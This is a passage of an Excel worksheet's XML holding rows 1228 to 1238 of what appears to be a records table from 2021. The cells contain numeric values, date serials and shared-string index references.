        <v>5625</v>
      </c>
      <c r="B1228" t="s">
        <v>9139</v>
      </c>
      <c r="C1228" t="s">
        <v>477</v>
      </c>
      <c r="D1228" t="s">
        <v>9140</v>
      </c>
      <c r="E1228" t="s">
        <v>49</v>
      </c>
      <c r="F1228" t="s">
        <v>9141</v>
      </c>
      <c r="G1228" s="1">
        <v>44354</v>
      </c>
      <c r="H1228">
        <v>11089</v>
      </c>
      <c r="I1228">
        <v>11089</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t="s">
        <v>9142</v>
      </c>
      <c r="AG1228">
        <v>95535</v>
      </c>
      <c r="AH1228">
        <v>29</v>
      </c>
      <c r="AJ1228">
        <v>383</v>
      </c>
      <c r="AK1228" t="s">
        <v>9143</v>
      </c>
      <c r="AL1228" t="s">
        <v>9144</v>
      </c>
      <c r="AM1228" t="s">
        <v>9145</v>
      </c>
      <c r="AN1228" t="s">
        <v>68</v>
      </c>
      <c r="AO1228">
        <v>2019</v>
      </c>
      <c r="AP1228">
        <v>81244494282</v>
      </c>
      <c r="AQ1228" t="s">
        <v>9146</v>
      </c>
      <c r="AR1228" t="s">
        <v>9142</v>
      </c>
      <c r="AS1228" t="s">
        <v>71</v>
      </c>
      <c r="AT1228" t="s">
        <v>72</v>
      </c>
      <c r="AU1228">
        <v>8</v>
      </c>
      <c r="AV1228">
        <v>0</v>
      </c>
      <c r="AW1228">
        <v>0</v>
      </c>
      <c r="AX1228">
        <v>0</v>
      </c>
      <c r="AY1228">
        <v>1</v>
      </c>
      <c r="AZ1228">
        <v>5</v>
      </c>
      <c r="BA1228" t="s">
        <v>17712</v>
      </c>
      <c r="BB1228">
        <v>0</v>
      </c>
      <c r="BC1228" t="s">
        <v>13915</v>
      </c>
      <c r="BD1228">
        <v>0</v>
      </c>
    </row>
    <row r="1229" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1229">
        <v>5549</v>
      </c>
      <c r="B1229" t="s">
        <v>9147</v>
      </c>
      <c r="C1229" t="s">
        <v>458</v>
      </c>
      <c r="D1229" t="s">
        <v>9148</v>
      </c>
      <c r="E1229" t="s">
        <v>363</v>
      </c>
      <c r="F1229" t="s">
        <v>364</v>
      </c>
      <c r="G1229" s="1">
        <v>44354</v>
      </c>
      <c r="H1229">
        <v>11103</v>
      </c>
      <c r="I1229">
        <v>11103</v>
      </c>
      <c r="J1229">
        <v>0</v>
      </c>
      <c r="K1229">
        <v>0</v>
      </c>
      <c r="L1229">
        <v>0</v>
      </c>
      <c r="M1229">
        <v>0</v>
      </c>
      <c r="N1229">
        <v>0</v>
      </c>
      <c r="O1229">
        <v>0</v>
      </c>
      <c r="P1229">
        <v>0</v>
      </c>
      <c r="Q1229">
        <v>0</v>
      </c>
      <c r="R1229">
        <v>0</v>
      </c>
      <c r="S1229">
        <v>0</v>
      </c>
      <c r="T1229">
        <v>1</v>
      </c>
      <c r="U1229">
        <v>0</v>
      </c>
      <c r="V1229">
        <v>0</v>
      </c>
      <c r="W1229">
        <v>0</v>
      </c>
      <c r="X1229">
        <v>0</v>
      </c>
      <c r="Y1229">
        <v>0</v>
      </c>
      <c r="Z1229">
        <v>0</v>
      </c>
      <c r="AA1229">
        <v>0</v>
      </c>
      <c r="AB1229">
        <v>0</v>
      </c>
      <c r="AC1229">
        <v>0</v>
      </c>
      <c r="AD1229">
        <v>0</v>
      </c>
      <c r="AE1229">
        <v>20</v>
      </c>
      <c r="AF1229" t="s">
        <v>9149</v>
      </c>
      <c r="AG1229">
        <v>29476</v>
      </c>
      <c r="AH1229">
        <v>5</v>
      </c>
      <c r="AJ1229">
        <v>153</v>
      </c>
      <c r="AK1229" t="s">
        <v>3815</v>
      </c>
      <c r="AL1229" t="s">
        <v>4589</v>
      </c>
      <c r="AM1229" t="s">
        <v>9150</v>
      </c>
      <c r="AN1229" t="s">
        <v>55</v>
      </c>
      <c r="AO1229">
        <v>2021</v>
      </c>
      <c r="AP1229">
        <v>816784998</v>
      </c>
      <c r="AQ1229">
        <v>816784998</v>
      </c>
      <c r="AR1229" t="s">
        <v>9149</v>
      </c>
      <c r="AS1229" t="s">
        <v>371</v>
      </c>
      <c r="AT1229" t="s">
        <v>58</v>
      </c>
      <c r="AU1229">
        <v>1</v>
      </c>
      <c r="AV1229">
        <v>1</v>
      </c>
      <c r="AW1229">
        <v>13</v>
      </c>
      <c r="AX1229">
        <v>12</v>
      </c>
      <c r="AY1229">
        <v>4</v>
      </c>
      <c r="AZ1229">
        <v>4</v>
      </c>
      <c r="BA1229" t="s">
        <v>17700</v>
      </c>
      <c r="BB1229" t="s">
        <v>16173</v>
      </c>
      <c r="BC1229" t="s">
        <v>9952</v>
      </c>
      <c r="BD1229" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="1230" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1230">
        <v>5671</v>
      </c>
      <c r="B1230" t="s">
        <v>248</v>
      </c>
      <c r="C1230" t="s">
        <v>99</v>
      </c>
      <c r="D1230" t="s">
        <v>9151</v>
      </c>
      <c r="E1230" t="s">
        <v>142</v>
      </c>
      <c r="F1230" t="s">
        <v>182</v>
      </c>
      <c r="G1230" s="1">
        <v>44379</v>
      </c>
      <c r="H1230">
        <v>11141</v>
      </c>
      <c r="I1230">
        <v>11141</v>
      </c>
      <c r="J1230">
        <v>4</v>
      </c>
      <c r="K1230">
        <v>0</v>
      </c>
      <c r="L1230">
        <v>1</v>
      </c>
      <c r="M1230">
        <v>0</v>
      </c>
      <c r="N1230">
        <v>0</v>
      </c>
      <c r="O1230">
        <v>0</v>
      </c>
      <c r="P1230">
        <v>0</v>
      </c>
      <c r="Q1230">
        <v>0</v>
      </c>
      <c r="R1230">
        <v>0</v>
      </c>
      <c r="S1230">
        <v>1</v>
      </c>
      <c r="T1230">
        <v>0</v>
      </c>
      <c r="U1230">
        <v>1000000</v>
      </c>
      <c r="V1230">
        <v>0</v>
      </c>
      <c r="W1230">
        <v>1200</v>
      </c>
      <c r="X1230">
        <v>0</v>
      </c>
      <c r="Y1230">
        <v>0</v>
      </c>
      <c r="Z1230">
        <v>0</v>
      </c>
      <c r="AA1230">
        <v>0</v>
      </c>
      <c r="AB1230">
        <v>0</v>
      </c>
      <c r="AC1230">
        <v>0</v>
      </c>
      <c r="AD1230">
        <v>1</v>
      </c>
      <c r="AE1230">
        <v>0</v>
      </c>
      <c r="AF1230" t="s">
        <v>251</v>
      </c>
      <c r="AG1230">
        <v>14450</v>
      </c>
      <c r="AH1230">
        <v>12</v>
      </c>
      <c r="AJ1230">
        <v>160</v>
      </c>
      <c r="AK1230" t="s">
        <v>396</v>
      </c>
      <c r="AL1230" t="s">
        <v>115</v>
      </c>
      <c r="AM1230" t="s">
        <v>9152</v>
      </c>
      <c r="AN1230" t="s">
        <v>55</v>
      </c>
      <c r="AO1230">
        <v>2005</v>
      </c>
      <c r="AP1230" t="s">
        <v>9153</v>
      </c>
      <c r="AQ1230" t="s">
        <v>9154</v>
      </c>
      <c r="AR1230" t="s">
        <v>9155</v>
      </c>
      <c r="AS1230" t="s">
        <v>71</v>
      </c>
      <c r="AT1230" t="s">
        <v>58</v>
      </c>
      <c r="AU1230">
        <v>26</v>
      </c>
      <c r="AV1230">
        <v>0</v>
      </c>
      <c r="AW1230">
        <v>10</v>
      </c>
      <c r="AX1230">
        <v>2</v>
      </c>
      <c r="AY1230">
        <v>2</v>
      </c>
      <c r="AZ1230">
        <v>3</v>
      </c>
      <c r="BA1230" t="s">
        <v>16634</v>
      </c>
      <c r="BB1230">
        <v>0</v>
      </c>
      <c r="BC1230" t="s">
        <v>9933</v>
      </c>
      <c r="BD1230" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="1231" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1231">
        <v>5672</v>
      </c>
      <c r="B1231" t="s">
        <v>9156</v>
      </c>
      <c r="C1231" t="s">
        <v>99</v>
      </c>
      <c r="D1231" t="s">
        <v>9157</v>
      </c>
      <c r="E1231" t="s">
        <v>142</v>
      </c>
      <c r="F1231" t="s">
        <v>9158</v>
      </c>
      <c r="G1231" s="1">
        <v>44327</v>
      </c>
      <c r="H1231">
        <v>11149</v>
      </c>
      <c r="I1231">
        <v>11149</v>
      </c>
      <c r="J1231">
        <v>1</v>
      </c>
      <c r="K1231">
        <v>0</v>
      </c>
      <c r="L1231">
        <v>0</v>
      </c>
      <c r="M1231">
        <v>0</v>
      </c>
      <c r="N1231">
        <v>1000</v>
      </c>
      <c r="O1231">
        <v>0</v>
      </c>
      <c r="P1231">
        <v>0</v>
      </c>
      <c r="Q1231">
        <v>0</v>
      </c>
      <c r="R1231">
        <v>20</v>
      </c>
      <c r="S1231">
        <v>0</v>
      </c>
      <c r="T1231">
        <v>0</v>
      </c>
      <c r="U1231">
        <v>500000</v>
      </c>
      <c r="V1231">
        <v>0</v>
      </c>
      <c r="W1231">
        <v>0</v>
      </c>
      <c r="X1231">
        <v>0</v>
      </c>
      <c r="Y1231">
        <v>0</v>
      </c>
      <c r="Z1231">
        <v>0</v>
      </c>
      <c r="AA1231">
        <v>0</v>
      </c>
      <c r="AB1231">
        <v>0</v>
      </c>
      <c r="AC1231">
        <v>2000</v>
      </c>
      <c r="AD1231">
        <v>0</v>
      </c>
      <c r="AE1231">
        <v>0</v>
      </c>
      <c r="AF1231" t="s">
        <v>9159</v>
      </c>
      <c r="AG1231">
        <v>14440</v>
      </c>
      <c r="AH1231">
        <v>12</v>
      </c>
      <c r="AJ1231">
        <v>160</v>
      </c>
      <c r="AK1231" t="s">
        <v>114</v>
      </c>
      <c r="AL1231" t="s">
        <v>114</v>
      </c>
      <c r="AM1231" t="s">
        <v>9160</v>
      </c>
      <c r="AN1231" t="s">
        <v>82</v>
      </c>
      <c r="AO1231">
        <v>1996</v>
      </c>
      <c r="AP1231">
        <v>62216683502</v>
      </c>
      <c r="AQ1231" t="s">
        <v>9161</v>
      </c>
      <c r="AR1231" t="s">
        <v>9159</v>
      </c>
      <c r="AS1231" t="s">
        <v>71</v>
      </c>
      <c r="AT1231" t="s">
        <v>86</v>
      </c>
      <c r="AU1231">
        <v>24</v>
      </c>
      <c r="AV1231">
        <v>1</v>
      </c>
      <c r="AW1231">
        <v>72</v>
      </c>
      <c r="AX1231">
        <v>156</v>
      </c>
      <c r="AY1231">
        <v>4</v>
      </c>
      <c r="AZ1231">
        <v>2</v>
      </c>
      <c r="BA1231" t="s">
        <v>16620</v>
      </c>
      <c r="BB1231" t="s">
        <v>16175</v>
      </c>
      <c r="BC1231">
        <v>0</v>
      </c>
      <c r="BD1231" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="1232" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1232">
        <v>5640</v>
      </c>
      <c r="B1232" t="s">
        <v>9162</v>
      </c>
      <c r="C1232" t="s">
        <v>88</v>
      </c>
      <c r="D1232" t="s">
        <v>9163</v>
      </c>
      <c r="E1232" t="s">
        <v>5553</v>
      </c>
      <c r="F1232" t="s">
        <v>9164</v>
      </c>
      <c r="G1232" s="1">
        <v>44316</v>
      </c>
      <c r="H1232">
        <v>11156</v>
      </c>
      <c r="I1232">
        <v>11156</v>
      </c>
      <c r="J1232">
        <v>0</v>
      </c>
      <c r="K1232">
        <v>0</v>
      </c>
      <c r="L1232">
        <v>0</v>
      </c>
      <c r="M1232">
        <v>0</v>
      </c>
      <c r="N1232">
        <v>0</v>
      </c>
      <c r="O1232">
        <v>0</v>
      </c>
      <c r="P1232">
        <v>0</v>
      </c>
      <c r="Q1232">
        <v>2</v>
      </c>
      <c r="R1232">
        <v>0</v>
      </c>
      <c r="S1232">
        <v>0</v>
      </c>
      <c r="T1232">
        <v>0</v>
      </c>
      <c r="U1232">
        <v>0</v>
      </c>
      <c r="V1232">
        <v>0</v>
      </c>
      <c r="W1232">
        <v>0</v>
      </c>
      <c r="X1232">
        <v>0</v>
      </c>
      <c r="Y1232">
        <v>0</v>
      </c>
      <c r="Z1232">
        <v>0</v>
      </c>
      <c r="AA1232">
        <v>0</v>
      </c>
      <c r="AB1232">
        <v>20</v>
      </c>
      <c r="AC1232">
        <v>0</v>
      </c>
      <c r="AD1232">
        <v>0</v>
      </c>
      <c r="AE1232">
        <v>0</v>
      </c>
      <c r="AF1232" t="s">
        <v>9165</v>
      </c>
      <c r="AG1232">
        <v>82111</v>
      </c>
      <c r="AH1232">
        <v>17</v>
      </c>
      <c r="AJ1232">
        <v>275</v>
      </c>
      <c r="AK1232" t="s">
        <v>9166</v>
      </c>
      <c r="AL1232" t="s">
        <v>9167</v>
      </c>
      <c r="AM1232" t="s">
        <v>9168</v>
      </c>
      <c r="AN1232" t="s">
        <v>68</v>
      </c>
      <c r="AO1232">
        <v>2013</v>
      </c>
      <c r="AP1232">
        <v>81246877326</v>
      </c>
      <c r="AQ1232" t="s">
        <v>9169</v>
      </c>
      <c r="AR1232" t="s">
        <v>9170</v>
      </c>
      <c r="AS1232" t="s">
        <v>71</v>
      </c>
      <c r="AT1232" t="s">
        <v>72</v>
      </c>
      <c r="AU1232">
        <v>15</v>
      </c>
      <c r="AV1232">
        <v>0</v>
      </c>
      <c r="AW1232">
        <v>0</v>
      </c>
      <c r="AX1232">
        <v>0</v>
      </c>
      <c r="AY1232">
        <v>0</v>
      </c>
      <c r="AZ1232">
        <v>6</v>
      </c>
      <c r="BA1232" t="s">
        <v>17720</v>
      </c>
      <c r="BB1232">
        <v>0</v>
      </c>
      <c r="BC1232" t="s">
        <v>13931</v>
      </c>
      <c r="BD1232">
        <v>0</v>
      </c>
    </row>
    <row r="1233" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1233">
        <v>5669</v>
      </c>
      <c r="B1233" t="s">
        <v>9171</v>
      </c>
      <c r="C1233" t="s">
        <v>726</v>
      </c>
      <c r="D1233" t="s">
        <v>9172</v>
      </c>
      <c r="E1233" t="s">
        <v>142</v>
      </c>
      <c r="F1233" t="s">
        <v>666</v>
      </c>
      <c r="G1233" s="1">
        <v>44364</v>
      </c>
      <c r="H1233">
        <v>11179</v>
      </c>
      <c r="I1233">
        <v>11179</v>
      </c>
      <c r="J1233">
        <v>1</v>
      </c>
      <c r="K1233">
        <v>0</v>
      </c>
      <c r="L1233">
        <v>1</v>
      </c>
      <c r="M1233">
        <v>0</v>
      </c>
      <c r="N1233">
        <v>0</v>
      </c>
      <c r="O1233">
        <v>0</v>
      </c>
      <c r="P1233">
        <v>0</v>
      </c>
      <c r="Q1233">
        <v>2</v>
      </c>
      <c r="R1233">
        <v>4</v>
      </c>
      <c r="S1233">
        <v>0</v>
      </c>
      <c r="T1233">
        <v>2</v>
      </c>
      <c r="U1233">
        <v>80</v>
      </c>
      <c r="V1233">
        <v>0</v>
      </c>
      <c r="W1233">
        <v>4</v>
      </c>
      <c r="X1233">
        <v>0</v>
      </c>
      <c r="Y1233">
        <v>0</v>
      </c>
      <c r="Z1233">
        <v>0</v>
      </c>
      <c r="AA1233">
        <v>0</v>
      </c>
      <c r="AB1233">
        <v>1000</v>
      </c>
      <c r="AC1233">
        <v>2000</v>
      </c>
      <c r="AD1233">
        <v>0</v>
      </c>
      <c r="AE1233">
        <v>1000</v>
      </c>
      <c r="AF1233" t="s">
        <v>9173</v>
      </c>
      <c r="AG1233">
        <v>87813</v>
      </c>
      <c r="AH1233">
        <v>32</v>
      </c>
      <c r="AJ1233">
        <v>472</v>
      </c>
      <c r="AK1233" t="s">
        <v>9174</v>
      </c>
      <c r="AL1233" t="s">
        <v>9175</v>
      </c>
      <c r="AM1233" t="s">
        <v>9176</v>
      </c>
      <c r="AN1233" t="s">
        <v>68</v>
      </c>
      <c r="AO1233">
        <v>2016</v>
      </c>
      <c r="AP1233">
        <v>81243943629</v>
      </c>
      <c r="AQ1233" t="s">
        <v>9177</v>
      </c>
      <c r="AR1233" t="s">
        <v>9178</v>
      </c>
      <c r="AS1233" t="s">
        <v>71</v>
      </c>
      <c r="AT1233" t="s">
        <v>72</v>
      </c>
      <c r="AU1233">
        <v>22</v>
      </c>
      <c r="AV1233">
        <v>2</v>
      </c>
      <c r="AW1233">
        <v>10</v>
      </c>
      <c r="AX1233">
        <v>5</v>
      </c>
      <c r="AY1233">
        <v>2</v>
      </c>
      <c r="AZ1233">
        <v>3</v>
      </c>
      <c r="BA1233" t="s">
        <v>17727</v>
      </c>
      <c r="BB1233">
        <v>0</v>
      </c>
      <c r="BC1233" t="s">
        <v>13937</v>
      </c>
      <c r="BD1233" t="s">
        <v>13938</v>
      </c>
    </row>
    <row r="1234" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1234">
        <v>5650</v>
      </c>
      <c r="B1234" t="s">
        <v>9179</v>
      </c>
      <c r="C1234" t="s">
        <v>3013</v>
      </c>
      <c r="D1234" t="s">
        <v>9180</v>
      </c>
      <c r="E1234" t="s">
        <v>644</v>
      </c>
      <c r="F1234" t="s">
        <v>9181</v>
      </c>
      <c r="G1234" s="1">
        <v>44316</v>
      </c>
      <c r="H1234">
        <v>11186</v>
      </c>
      <c r="I1234">
        <v>11186</v>
      </c>
      <c r="J1234">
        <v>0</v>
      </c>
      <c r="K1234">
        <v>0</v>
      </c>
      <c r="L1234">
        <v>0</v>
      </c>
      <c r="M1234">
        <v>0</v>
      </c>
      <c r="N1234">
        <v>0</v>
      </c>
      <c r="O1234">
        <v>0</v>
      </c>
      <c r="P1234">
        <v>0</v>
      </c>
      <c r="Q1234">
        <v>1</v>
      </c>
      <c r="R1234">
        <v>0</v>
      </c>
      <c r="S1234">
        <v>0</v>
      </c>
      <c r="T1234">
        <v>0</v>
      </c>
      <c r="U1234">
        <v>0</v>
      </c>
      <c r="V1234">
        <v>0</v>
      </c>
      <c r="W1234">
        <v>0</v>
      </c>
      <c r="X1234">
        <v>0</v>
      </c>
      <c r="Y1234">
        <v>0</v>
      </c>
      <c r="Z1234">
        <v>0</v>
      </c>
      <c r="AA1234">
        <v>0</v>
      </c>
      <c r="AB1234">
        <v>80</v>
      </c>
      <c r="AC1234">
        <v>0</v>
      </c>
      <c r="AD1234">
        <v>0</v>
      </c>
      <c r="AE1234">
        <v>0</v>
      </c>
      <c r="AF1234" t="s">
        <v>9182</v>
      </c>
      <c r="AG1234">
        <v>28783</v>
      </c>
      <c r="AH1234">
        <v>4</v>
      </c>
      <c r="AJ1234">
        <v>83</v>
      </c>
      <c r="AK1234" t="s">
        <v>9183</v>
      </c>
      <c r="AL1234" t="s">
        <v>9184</v>
      </c>
      <c r="AM1234" t="s">
        <v>9185</v>
      </c>
      <c r="AN1234" t="s">
        <v>68</v>
      </c>
      <c r="AO1234">
        <v>2019</v>
      </c>
      <c r="AP1234">
        <v>85265777228</v>
      </c>
      <c r="AQ1234" t="s">
        <v>9186</v>
      </c>
      <c r="AR1234" t="s">
        <v>9182</v>
      </c>
      <c r="AS1234" t="s">
        <v>71</v>
      </c>
      <c r="AT1234" t="s">
        <v>72</v>
      </c>
      <c r="AU1234">
        <v>26</v>
      </c>
      <c r="AV1234">
        <v>0</v>
      </c>
      <c r="AW1234">
        <v>0</v>
      </c>
      <c r="AX1234">
        <v>0</v>
      </c>
      <c r="AY1234">
        <v>5</v>
      </c>
      <c r="AZ1234">
        <v>0</v>
      </c>
      <c r="BA1234" t="s">
        <v>17723</v>
      </c>
      <c r="BB1234" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1234">
        <v>0</v>
      </c>
      <c r="BD1234" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1235" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1235">
        <v>5667</v>
      </c>
      <c r="B1235" t="s">
        <v>9187</v>
      </c>
      <c r="C1235" t="s">
        <v>726</v>
      </c>
      <c r="D1235" t="s">
        <v>9188</v>
      </c>
      <c r="E1235" t="s">
        <v>142</v>
      </c>
      <c r="F1235" t="s">
        <v>403</v>
      </c>
      <c r="G1235" s="1">
        <v>44368</v>
      </c>
      <c r="H1235">
        <v>11205</v>
      </c>
      <c r="I1235">
        <v>11205</v>
      </c>
      <c r="J1235">
        <v>2</v>
      </c>
      <c r="K1235">
        <v>0</v>
      </c>
      <c r="L1235">
        <v>3</v>
      </c>
      <c r="M1235">
        <v>1</v>
      </c>
      <c r="N1235">
        <v>0</v>
      </c>
      <c r="O1235">
        <v>0</v>
      </c>
      <c r="P1235">
        <v>0</v>
      </c>
      <c r="Q1235">
        <v>1</v>
      </c>
      <c r="R1235">
        <v>25</v>
      </c>
      <c r="S1235">
        <v>0</v>
      </c>
      <c r="T1235">
        <v>1</v>
      </c>
      <c r="U1235">
        <v>150000</v>
      </c>
      <c r="V1235">
        <v>0</v>
      </c>
      <c r="W1235">
        <v>7000</v>
      </c>
      <c r="X1235">
        <v>1600</v>
      </c>
      <c r="Y1235">
        <v>0</v>
      </c>
      <c r="Z1235">
        <v>0</v>
      </c>
      <c r="AA1235">
        <v>0</v>
      </c>
      <c r="AB1235">
        <v>100</v>
      </c>
      <c r="AC1235">
        <v>14000</v>
      </c>
      <c r="AD1235">
        <v>0</v>
      </c>
      <c r="AE1235">
        <v>10000</v>
      </c>
      <c r="AF1235" t="s">
        <v>9189</v>
      </c>
      <c r="AG1235">
        <v>97727</v>
      </c>
      <c r="AH1235">
        <v>32</v>
      </c>
      <c r="AJ1235">
        <v>471</v>
      </c>
      <c r="AK1235" t="s">
        <v>8368</v>
      </c>
      <c r="AL1235" t="s">
        <v>9190</v>
      </c>
      <c r="AM1235" t="s">
        <v>9191</v>
      </c>
      <c r="AN1235" t="s">
        <v>55</v>
      </c>
      <c r="AO1235">
        <v>2019</v>
      </c>
      <c r="AP1235">
        <v>82344444426</v>
      </c>
      <c r="AQ1235" t="s">
        <v>9192</v>
      </c>
      <c r="AR1235" t="s">
        <v>9189</v>
      </c>
      <c r="AS1235" t="s">
        <v>71</v>
      </c>
      <c r="AT1235" t="s">
        <v>58</v>
      </c>
      <c r="AU1235">
        <v>0</v>
      </c>
      <c r="AV1235">
        <v>0</v>
      </c>
      <c r="AW1235">
        <v>22</v>
      </c>
      <c r="AX1235">
        <v>5</v>
      </c>
      <c r="AY1235">
        <v>3</v>
      </c>
      <c r="AZ1235">
        <v>1</v>
      </c>
      <c r="BA1235" t="s">
        <v>17726</v>
      </c>
      <c r="BB1235">
        <v>0</v>
      </c>
      <c r="BC1235" t="s">
        <v>13958</v>
      </c>
      <c r="BD1235" t="s">
        <v>13959</v>
      </c>
    </row>
    <row r="1236" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1236">
        <v>5676</v>
      </c>
      <c r="B1236" t="s">
        <v>9193</v>
      </c>
      <c r="C1236" t="s">
        <v>477</v>
      </c>
      <c r="D1236" t="s">
        <v>9194</v>
      </c>
      <c r="E1236" t="s">
        <v>274</v>
      </c>
      <c r="F1236" t="s">
        <v>143</v>
      </c>
      <c r="G1236" s="1">
        <v>44350</v>
      </c>
      <c r="H1236">
        <v>11250</v>
      </c>
      <c r="I1236">
        <v>11250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t="s">
        <v>9195</v>
      </c>
      <c r="AG1236">
        <v>95371</v>
      </c>
      <c r="AH1236">
        <v>29</v>
      </c>
      <c r="AJ1236">
        <v>376</v>
      </c>
      <c r="AK1236" t="s">
        <v>9196</v>
      </c>
      <c r="AL1236" t="s">
        <v>9197</v>
      </c>
      <c r="AM1236" t="s">
        <v>9198</v>
      </c>
      <c r="AN1236" t="s">
        <v>68</v>
      </c>
      <c r="AO1236">
        <v>2015</v>
      </c>
      <c r="AP1236">
        <v>85256742122</v>
      </c>
      <c r="AQ1236" t="s">
        <v>9199</v>
      </c>
      <c r="AR1236" t="s">
        <v>9195</v>
      </c>
      <c r="AS1236" t="s">
        <v>71</v>
      </c>
      <c r="AT1236" t="s">
        <v>72</v>
      </c>
      <c r="AU1236">
        <v>20</v>
      </c>
      <c r="AV1236">
        <v>0</v>
      </c>
      <c r="AW1236">
        <v>0</v>
      </c>
      <c r="AX1236">
        <v>0</v>
      </c>
      <c r="AY1236">
        <v>1</v>
      </c>
      <c r="AZ1236">
        <v>2</v>
      </c>
      <c r="BA1236" t="s">
        <v>17731</v>
      </c>
      <c r="BB1236">
        <v>0</v>
      </c>
      <c r="BC1236" t="s">
        <v>13708</v>
      </c>
      <c r="BD1236">
        <v>0</v>
      </c>
    </row>
    <row r="1237" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1237">
        <v>5673</v>
      </c>
      <c r="B1237" t="s">
        <v>9200</v>
      </c>
      <c r="C1237" t="s">
        <v>4653</v>
      </c>
      <c r="D1237" t="s">
        <v>9201</v>
      </c>
      <c r="E1237" t="s">
        <v>1206</v>
      </c>
      <c r="F1237" t="s">
        <v>9202</v>
      </c>
      <c r="G1237" s="1">
        <v>44347</v>
      </c>
      <c r="H1237">
        <v>11259</v>
      </c>
      <c r="I1237">
        <v>11259</v>
      </c>
      <c r="J1237">
        <v>0</v>
      </c>
      <c r="K1237">
        <v>0</v>
      </c>
      <c r="L1237">
        <v>0</v>
      </c>
      <c r="M1237">
        <v>0</v>
      </c>
      <c r="N1237">
        <v>0</v>
      </c>
      <c r="O1237">
        <v>0</v>
      </c>
      <c r="P1237">
        <v>0</v>
      </c>
      <c r="Q1237">
        <v>1</v>
      </c>
      <c r="R1237">
        <v>1</v>
      </c>
      <c r="S1237">
        <v>0</v>
      </c>
      <c r="T1237">
        <v>1</v>
      </c>
      <c r="U1237">
        <v>0</v>
      </c>
      <c r="V1237">
        <v>0</v>
      </c>
      <c r="W1237">
        <v>0</v>
      </c>
      <c r="X1237">
        <v>0</v>
      </c>
      <c r="Y1237">
        <v>0</v>
      </c>
      <c r="Z1237">
        <v>0</v>
      </c>
      <c r="AA1237">
        <v>0</v>
      </c>
      <c r="AB1237">
        <v>500</v>
      </c>
      <c r="AC1237">
        <v>500</v>
      </c>
      <c r="AD1237">
        <v>0</v>
      </c>
      <c r="AE1237">
        <v>500</v>
      </c>
      <c r="AF1237" t="s">
        <v>9203</v>
      </c>
      <c r="AG1237">
        <v>36129</v>
      </c>
      <c r="AH1237">
        <v>7</v>
      </c>
      <c r="AJ1237">
        <v>97</v>
      </c>
      <c r="AK1237" t="s">
        <v>9204</v>
      </c>
      <c r="AL1237" t="s">
        <v>9205</v>
      </c>
      <c r="AM1237" t="s">
        <v>9206</v>
      </c>
      <c r="AN1237" t="s">
        <v>68</v>
      </c>
      <c r="AO1237">
        <v>2012</v>
      </c>
      <c r="AP1237">
        <v>81273212911</v>
      </c>
      <c r="AQ1237">
        <v>81273212911</v>
      </c>
      <c r="AR1237" t="s">
        <v>9203</v>
      </c>
      <c r="AS1237" t="s">
        <v>71</v>
      </c>
      <c r="AT1237" t="s">
        <v>72</v>
      </c>
      <c r="AU1237">
        <v>10</v>
      </c>
      <c r="AV1237">
        <v>0</v>
      </c>
      <c r="AW1237">
        <v>0</v>
      </c>
      <c r="AX1237">
        <v>0</v>
      </c>
      <c r="AY1237">
        <v>3</v>
      </c>
      <c r="AZ1237">
        <v>2</v>
      </c>
      <c r="BA1237" t="s">
        <v>17728</v>
      </c>
      <c r="BB1237" t="s">
        <v>16184</v>
      </c>
      <c r="BC1237" t="s">
        <v>10448</v>
      </c>
      <c r="BD1237">
        <v>0</v>
      </c>
    </row>
    <row r="1238" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1238">
        <v>5679</v>
      </c>
      <c r="B1238" t="s">
        <v>9207</v>
      </c>
      <c r="C1238" t="s">
        <v>3717</v>
      </c>
      <c r="D1238" t="s">
        <v>9208</v>
      </c>
      <c r="E1238" t="s">
        <v>49</v>
      </c>
      <c r="F1238" t="s">
        <v>9209</v>
      </c>
      <c r="G1238" s="1">
        <v>44344</v>
      </c>
      <c r="H1238">
        <v>11275</v>
      </c>
      <c r="I1238">
        <v>11275</v>
      </c>
      <c r="J1238">
        <v>0</v>
      </c>
      <c r="K1238">
        <v>0</v>
      </c>
      <c r="L1238">
        <v>0</v>
      </c>
      <c r="M1238">
        <v>0</v>
      </c>
      <c r="N1238">
        <v>0</v>
      </c>
      <c r="O1238">
        <v>2</v>
      </c>
      <c r="P1238">
        <v>0</v>
      </c>
      <c r="Q1238">
        <v>1</v>
      </c>
      <c r="R1238">
        <v>1</v>
      </c>
      <c r="S1238">
        <v>0</v>
      </c>
      <c r="T1238">
        <v>1</v>
      </c>
      <c r="U1238">
        <v>0</v>
      </c>
      <c r="V1238">
        <v>0</v>
      </c>
      <c r="W1238">
        <v>0</v>
      </c>
      <c r="X1238">
        <v>0</v>
      </c>
      <c r="Y1238">
        <v>0</v>
      </c>
      <c r="Z1238">
        <v>500</v>
      </c>
      <c r="AA1238">
        <v>0</v>
      </c>
      <c r="AB1238">
        <v>300</v>
      </c>
      <c r="AC1238">
        <v>300</v>
      </c>
      <c r="AD1238">
        <v>0</v>
      </c>
      <c r="AE1238">
        <v>1000</v>
      </c>
      <c r="AF1238" t="s">
        <v>9210</v>
      </c>
      <c r="AG1238">
        <v>38211</v>
      </c>
      <c r="AH1238">
        <v>8</v>
      </c>
      <c r="AJ1238">
        <v>125</v>
      </c>
      <c r="AK1238" t="s">
        <v>9211</v>
      </c>
      <c r="AL1238" t="s">
        <v>9212</v>
      </c>
      <c r="AM1238" t="s">
        <v>9213</v>
      </c>
      <c r="AN1238" t="s">
        <v>68</v>
      </c>
      <c r="AO1238">
        <v>2018</v>
      </c>
      <c r="AP1238">
        <v>82279094900</v>
      </c>
      <c r="AQ1238" t="s">
        <v>9214</v>
      </c>
      <c r="AR1238" t="s">
        <v>9210</v>
      </c>
      <c r="AS1238" t="s">
        <v>71</v>
      </c>
      <c r="AT1238" t="s">
        <v>72</v>
      </c>
      <c r="AU1238">
        <v>20</v>
      </c>
      <c r="AV1238">
        <v>0</v>
      </c>
      <c r="AW1238">
        <v>0</v>
      </c>
      <c r="AX1238">
        <v>0</v>
